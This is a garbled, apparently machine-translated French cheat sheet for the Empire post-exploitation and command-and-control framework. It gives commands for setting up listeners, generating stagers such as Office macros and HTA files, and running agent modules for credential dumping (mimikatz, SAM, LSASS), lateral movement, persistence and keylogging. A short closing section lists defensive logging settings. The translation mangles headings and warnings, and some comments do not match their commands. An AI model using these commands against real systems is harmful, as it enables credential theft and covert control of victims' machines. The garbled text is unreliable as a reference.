Feuille de chaleur Empire Framework
Aperçu général
Empire est un cadre post-exploitation qui comprend un agent Windows pur PowerShell 2.0 et un agent Python 3 Linux/macOS pur. Il fournit une puissante infrastructure de commande et de contrôle (C2) pour les opérations de l'équipe rouge, les essais de pénétration et l'émulation adverse.
C'est pas vrai. Attention : Empire est un outil de test de sécurité qui ne devrait être utilisé que dans les environnements où vous avez la permission explicite de le faire.
Installation
De GitHub
# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git
# Navigate to the directory
cd Empire
# Run the installation script
sudo ./setup/install.sh
Utilisation de Docker
# Pull the Docker image
docker pull bcsecurity/empire:latest
# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```_
### Sur Kali Linux
```bash
# Install from package manager
sudo apt update
sudo apt install powershell-empire
```_
## Utilisation de base
### Empire de départ
```bash
# Start the Empire server
sudo empire
# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>
Utilisation de Starkiller (GUI)
# Install Starkiller
npm install -g @starkiller/starkiller
# Run Starkiller
starkiller
Empire CLI Navigation
| Command | Description |
|---|---|
help |
Display help menu |
menu |
Return to the main menu |
back |
Go back one menu level |
exit |
Exit Empire |
usemodule <module> |
Select a module to use |
usestager <stager> |
Select a stager to use |
uselistener <listener> |
Select a listener to use |
interact <agent> |
Interact with an agent |
searchmodule <term> |
Search for modules |
Auditeurs
Création d'un Auditeur
# In Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
execute
Options d'écoute courantes
| Option | Description |
|---|---|
Name |
Name for the listener |
Host |
IP/hostname for staging |
Port |
Port for the listener |
CertPath |
Certificate path for HTTPS |
DefaultDelay |
Agent callback delay (in seconds) |
DefaultJitter |
Jitter in agent callbacks (0.0-1.0) |
DefaultProfile |
Default communication profile |
KillDate |
Date for the listener to exit (MM/DD/YYYY) |
WorkingHours |
Hours for the agent to callback (09:00-17:00) |
Gestion de l'auditeur
# List all listeners
listeners
# Kill a listener
kill http_listener
# View a listener's options
info http_listener
Échelles
Générer un stade
# In Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generate
Types d'étapes communs
| Stager | Description |
|---|---|
windows/launcher_bat |
BAT file launcher |
windows/launcher_vbs |
VBS script launcher |
windows/launcher_powershell |
PowerShell launcher |
multi/launcher |
Multi-platform launcher |
osx/launcher |
macOS launcher |
linux/launcher |
Linux launcher |
windows/dll |
DLL launcher |
windows/macro |
Office macro launcher |
windows/hta |
HTA launcher |
Agents
Commandes d'agents
# List all agents
agents
# Interact with an agent
interact C2AGENT123
# Get agent info
info
# Execute a shell command
shell whoami
# Run a PowerShell command
powershell Get-Process
# Upload a file
upload /path/to/local/file /path/on/target
# Download a file
download /path/on/target /local/path
# Take a screenshot
screenshot
# Exit agent menu
back
Gestion des agents
# Rename an agent
rename C2AGENT123 new_name
# Kill an agent
kill C2AGENT123
# Remove an agent from the database
remove C2AGENT123
# Set sleep interval
sleep 30
# Set jitter percentage
sysinfo
Modules
Utilisation des modules
# List available modules
usemodule
# Search for modules
searchmodule credentials
# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user
# Set module options
set Username administrator
# Execute the module
execute
Catégories communes de modules
Accès aux titres de créance
# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords
# Dump SAM database
usemodule powershell/credentials/sam
# Dump LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump
Sensibilisation à la situation
# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user
# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer
# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group
Mouvement latéral
# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi
# PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec
# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm
Persistance
# Registry persistence
usemodule powershell/persistence/userland/registry
# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks
# WMI persistence
usemodule powershell/persistence/elevated/wmi
Caractéristiques avancées
Profils C2 malléables
# In Empire CLI
profiles
use default
set DefaultProfile /path/to/profile.profile
OPSEC Considérations
# Set agent kill date
set KillDate 01/01/2025
# Set working hours
set WorkingHours 09:00-17:00
# Increase agent sleep time
sleep 300 30
Exfiltration des données
# Use keylogging module
usemodule powershell/collection/keylogger
# Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor
# Use screenshot module
usemodule powershell/collection/screenshot
Dépannage
Questions communes
- ** Problèmes de connexion* *
# Check if the listener is running
listeners
# Verify firewall settings
sudo iptables -L
# Check for port conflicts
netstat -tuln|grep <port>
```
2. **Agent ne vérifiant pas En**
```bash
# Verify agent is running
agents
# Check for network connectivity issues
# Verify sleep/jitter settings
```
3. **Défauts d'exécution des modules* *
```bash
# Check module requirements
info
# Verify agent privileges
shell whoami
# Try running in a different process context
usemodule powershell/management/psinject
```
## Mesures défensives
### Méthodes de détection
- PowerShell Script Block Logging
- Module PowerShell Logging
- AMSI (Interface de balayage antimalware)
- Analyse du trafic réseau
- Analyse comportementale
### Techniques de prévention
```powershell
# Enable PowerShell Script Block Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Enable PowerShell Module Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
# Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
Ressources
- [BC Security GitHub] (LINK_4)
- [Empire Wiki] (LINK_4)
- [Starkiller GitHub] (LINK_4)
- [MITRE ATT&CK - Empire] (LINK_4)
*Cette feuille de triche fournit une référence complète pour l'utilisation d'Empire dans les scénarios de tests de sécurité. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *